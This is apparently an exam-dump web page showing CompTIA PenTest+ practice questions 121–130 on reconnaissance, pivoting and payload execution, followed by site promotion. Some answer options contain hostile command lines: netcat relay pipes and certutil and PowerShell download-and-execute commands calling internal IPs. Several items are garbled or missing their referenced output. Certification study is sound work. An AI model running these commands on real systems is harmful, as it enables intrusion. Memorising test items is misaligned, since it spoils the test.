Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :272 Q&As
  • Last Updated
    :Apr 02, 2025

CompTIA CompTIA Certifications PT0-003 Questions & Answers

  • Question 121:

    A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output: Which of the following targets should the tester select next?

    A. fileserver

    B. hrdatabase

    C. legaldatabase

    D. financesite

  • Question 122:

    During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

    A. A collection of email addresses for the target domain that is available on multiple sources on the internet

    B. DNS records for the target domain and subdomains that could be used to increase the external attack surface

    C. Data breach information about the organization that could be used for additional enumeration

    D. Information from the target's main web page that collects usernames, metadata, and possible data exposures

  • Question 123:

    While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

    A. Configuration changes were not reverted.

    B. A full backup restoration is required for the server.

    C. The penetration test was not completed on time.

    D. The penetration tester was locked out of the system.

  • Question 124:

    As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

    A. Logic bomb

    B. SQL injection

    C. Brute-force attack

    D. Cross-site scripting

  • Question 125:

    A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

    A. Smishing

    B. Impersonation

    C. Tailgating

    D. Whaling

  • Question 126:

    Which of the following components should a penetration tester include in an assessment report?

    A. User activities

    B. Customer remediation plan

    C. Key management

    D. Attack narrative

  • Question 127:

    A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

    A. ProxyChains

    B. Netcat

    C. PowerShell ISE

    D. Process IDs

  • Question 128:

    A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?

    A. Shoulder surfing

    B. Recon-ng

    C. Social media

    D. Password dumps

  • Question 129:

    A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?

    A. attacker_host$ nmap -sT | nc -n 22

    B. attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 80 | tee backpipe

    C. attacker_host$ nc -nlp 8000 | nc -n attacker_host$ nmap -sT 127.0.0.1

    D. attacker_host$ proxychains nmap -sT

  • Question 130:

    A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

    A. powershell.exe impo C:\tools\foo.ps1

    B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe

    C. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")

    D. rundll32.exe c:\path\foo.dll,functName

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.